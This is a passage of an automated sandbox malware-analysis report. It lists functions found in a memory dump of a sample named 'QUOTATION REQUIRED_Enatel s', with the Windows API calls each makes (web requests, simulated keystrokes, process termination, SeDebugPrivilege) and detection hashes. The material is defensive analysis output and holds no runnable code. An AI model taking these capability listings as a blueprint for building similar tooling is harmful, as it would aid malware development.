                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                    • Opcode ID: 531d8560a9be4216024eb2bf49163f6eff0a03fc9ae6ce535b26dc6dca881831
                                                                                                                    • Instruction ID: c8ca6a881a8ee91ba4e3e03c0d6ae0073af0ce39564d8f8ea29cac7ef9f474ce
                                                                                                                    • Opcode Fuzzy Hash: 531d8560a9be4216024eb2bf49163f6eff0a03fc9ae6ce535b26dc6dca881831
                                                                                                                    • Instruction Fuzzy Hash: 4851ADB0504304AFD700DF10DC95FAE77E4FB85760F000529F992672A2CBB49944EBA2
                                                                                                                    Function 00F8C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8C272
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8C29A
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8C2CA
                                                                                                                    • GetLastError.KERNEL32 ref: 00F8C322
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00F8C336
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00F8C341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: 3fe1d2ea89e75d68e78e8246fcdeb07d218786bcfb25379e9ccc04c93035c3df
                                                                                                                    • Instruction ID: 714dd90837772956a3d3404a23e38a72d9929877cbb48e739d64bb3b9d3d035d
                                                                                                                    • Opcode Fuzzy Hash: 3fe1d2ea89e75d68e78e8246fcdeb07d218786bcfb25379e9ccc04c93035c3df
                                                                                                                    • Instruction Fuzzy Hash: D5317FB1600608AFDB21AF649C88AAB7BFCEB49754F10851EF446D2240DB34DD05ABF0
                                                                                                                    Function 00F7989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F53AAF,?,?,Bad directive syntax error,00FACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F798BC
                                                                                                                    • LoadStringW.USER32(00000000,?,00F53AAF,?), ref: 00F798C3
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F79987
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 858772685-4153970271
                                                                                                                    • Opcode ID: ec2458159cddf8aa77c11cf0f0ab175afd91d8604393b321d347ca58dd24a6cd
                                                                                                                    • Instruction ID: db42e77c774a8c1a0842bddf2ed0c853a8395acbe85149a68313d59a22c40664
                                                                                                                    • Opcode Fuzzy Hash: ec2458159cddf8aa77c11cf0f0ab175afd91d8604393b321d347ca58dd24a6cd
                                                                                                                    • Instruction Fuzzy Hash: 42217E3280421AABDF15EF90CC06EEE7775BF19310F04442AF619621A2EB75A658FB51
                                                                                                                    Function 00F7209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 00F720AB
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F720C0
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F7214D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                                    • Opcode ID: 90ae2ed4905c94e3ea93488351d874d461c8b52ba792fb6b2aa99da4529a4536
                                                                                                                    • Instruction ID: c3bbc7e06e42e0d832aee4f0ac25d8ceb86960508054cbef80a915ea4005ba6b
                                                                                                                    • Opcode Fuzzy Hash: 90ae2ed4905c94e3ea93488351d874d461c8b52ba792fb6b2aa99da4529a4536
                                                                                                                    • Instruction Fuzzy Hash: 1111E97B688706B9FA016620DC07DA6379CEB05734F604117FB0CA51E1FEA9B8417656
                                                                                                                    Function 00F48D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a709d2a81250b8482f7e75ecb17a8b56ade382bfc4717c926b993515df1ddc6
                                                                                                                    • Instruction ID: 68ab80fb54706df529f5bc898f1d4be8da2660a6b9ccbd43d57c91af9daf38ca
                                                                                                                    • Opcode Fuzzy Hash: 9a709d2a81250b8482f7e75ecb17a8b56ade382bfc4717c926b993515df1ddc6
                                                                                                                    • Instruction Fuzzy Hash: B0C1B375E082499FDB11DFACDC41BAEBFB0AF49320F044155F914A7292CBB49942EB61
                                                                                                                    Function 00F4CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1282221369-0
                                                                                                                    • Opcode ID: 0db86231facc50f476173f64371f9a9c267e8873ff98a177ba69e2577eac8294
                                                                                                                    • Instruction ID: 8be7226bd2e11d309ba56f3686e71ee009a97539dc19054977cb85148f77a549
                                                                                                                    • Opcode Fuzzy Hash: 0db86231facc50f476173f64371f9a9c267e8873ff98a177ba69e2577eac8294
                                                                                                                    • Instruction Fuzzy Hash: 83612571E05244ABDB61AFB89C81A6A7FA5EF05330F04416DFD409B282EF399D44B7B0
                                                                                                                    Function 00FA50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FA5186
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00FA51C7
                                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FA51CD
                                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FA51D1
                                                                                                                      • Part of subcall function 00FA6FBA: DeleteObject.GDI32(00000000), ref: 00FA6FE6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA520D
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA521A
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FA524D
                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FA5287
                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FA5296
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3210457359-0
                                                                                                                    • Opcode ID: 4bfbd4b75a4fafad8e70f70ddcecede246582391e7aa4704088f81f2ce0d45b9
                                                                                                                    • Instruction ID: e769735fc55bc24260076a5cc4b512e7c82d78de13c2e087ca2c7c3547e5d018
                                                                                                                    • Opcode Fuzzy Hash: 4bfbd4b75a4fafad8e70f70ddcecede246582391e7aa4704088f81f2ce0d45b9
                                                                                                                    • Instruction Fuzzy Hash: 335190B1A50A08BEEF349F64DC4ABE93BA5FB07B25F144011F6159A2E1C775A980FB40
                                                                                                                    Function 00F28B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F66890
                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F668A9
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F668B9
                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F668D1
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F668F2
                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F28874,00000000,00000000,00000000,000000FF,00000000), ref: 00F66901
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F6691E
                                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F28874,00000000,00000000,00000000,000000FF,00000000), ref: 00F6692D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268354404-0
                                                                                                                    • Opcode ID: bbdc44520502d36258a9be22fa31298813bfa829ff4435fa6795eddeb6358c68
                                                                                                                    • Instruction ID: 887fb32b590e6a9c1f02fc2d77faa146c2cfe36669c2745731ac09dfaf63f3a1
                                                                                                                    • Opcode Fuzzy Hash: bbdc44520502d36258a9be22fa31298813bfa829ff4435fa6795eddeb6358c68
                                                                                                                    • Instruction Fuzzy Hash: BB5179B0A00209AFDB20CF25DC95FAA7BB5FF88760F104519F916D72A0DB70E991EB50
                                                                                                                    Function 00F8C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8C182
                                                                                                                    • GetLastError.KERNEL32 ref: 00F8C195
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00F8C1A9
                                                                                                                      • Part of subcall function 00F8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8C272
                                                                                                                      • Part of subcall function 00F8C253: GetLastError.KERNEL32 ref: 00F8C322
                                                                                                                      • Part of subcall function 00F8C253: SetEvent.KERNEL32(?), ref: 00F8C336
                                                                                                                      • Part of subcall function 00F8C253: InternetCloseHandle.WININET(00000000), ref: 00F8C341
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 337547030-0
                                                                                                                    • Opcode ID: 453e02b95e3f5ac65dbf01ff9ca1fdb3dbbd64187f02c1b0d3ff6592eb169245
                                                                                                                    • Instruction ID: f1bee96bd8ed9f698e5b388b8166888d93c12535f186360e8d3b3665c9947b6f
                                                                                                                    • Opcode Fuzzy Hash: 453e02b95e3f5ac65dbf01ff9ca1fdb3dbbd64187f02c1b0d3ff6592eb169245
                                                                                                                    • Instruction Fuzzy Hash: 3D3180B1500605AFDB21AFB5DC44AA6BBF8FF19310B00441DF95682660DB35E814BBF0
                                                                                                                    Function 00F725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
                                                                                                                      • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
                                                                                                                      • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F725BD
                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F725DB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F725DF
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F725E9
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F72601
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F72605
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F7260F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F72623
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F72627
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: fcdfe46a15eace38c18286515297db68d15f4388ad07d566153e180714d16f1f
                                                                                                                    • Instruction ID: 0103ebe7966df56a01e725198c7ae714967b8a62b7327e0e3c811e88df6041e7
                                                                                                                    • Opcode Fuzzy Hash: fcdfe46a15eace38c18286515297db68d15f4388ad07d566153e180714d16f1f
                                                                                                                    • Instruction Fuzzy Hash: C801D471390214BBFB1067699C8AF593F69DB4EB12F104006F318AE1D1C9F22445AAAA
                                                                                                                    Function 00F71803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F71449,?,?,00000000), ref: 00F7180C
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F71813
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71449,?,?,00000000), ref: 00F71828
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F71449,?,?,00000000), ref: 00F71830
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F71833
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71449,?,?,00000000), ref: 00F71843
                                                                                                                    • GetCurrentProcess.KERNEL32(00F71449,00000000,?,00F71449,?,?,00000000), ref: 00F7184B
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00F71449,?,?,00000000), ref: 00F7184E
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00F71874,00000000,00000000,00000000), ref: 00F71868
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 365aa92c231d043644f68200c0cb88fa6f828803c2c4824537a9a018a3a70120
                                                                                                                    • Instruction ID: 28a819be54d583c1865336f2e088798c497c78679083e1733c3522d3fbb1aac0
                                                                                                                    • Opcode Fuzzy Hash: 365aa92c231d043644f68200c0cb88fa6f828803c2c4824537a9a018a3a70120
                                                                                                                    • Instruction Fuzzy Hash: 9C01BBB5340308BFE710ABA5DC4DF6B3BACEB8AB11F008411FA05DB1A2DA709804DB61
                                                                                                                    Function 00F9A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00F7D501
                                                                                                                      • Part of subcall function 00F7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00F7D50F
                                                                                                                      • Part of subcall function 00F7D4DC: CloseHandle.KERNEL32(00000000), ref: 00F7D5DC
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9A16D
                                                                                                                    • GetLastError.KERNEL32 ref: 00F9A180
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9A1B3
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F9A268
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00F9A273
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F9A2C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 2f03730df517f78303f8000dab91c0bc6dcbc4962bab23cd2e0ee50e26dee448
                                                                                                                    • Instruction ID: d394f3ca51b79ebf282b3ea1afb8d327e2b7b5f937bb4e2e13b0837f7fce0c27
                                                                                                                    • Opcode Fuzzy Hash: 2f03730df517f78303f8000dab91c0bc6dcbc4962bab23cd2e0ee50e26dee448
                                                                                                                    • Instruction Fuzzy Hash: EB6171716082419FEB20DF14C894F55BBE1AF44318F14849CE4668B7A3C776ED85DBD2
                                                                                                                    Function 00FA3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FA3925
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FA393A
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FA3954
                                                                                                                    • _wcslen.LIBCMT ref: 00FA3999
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FA39C6
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FA39F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
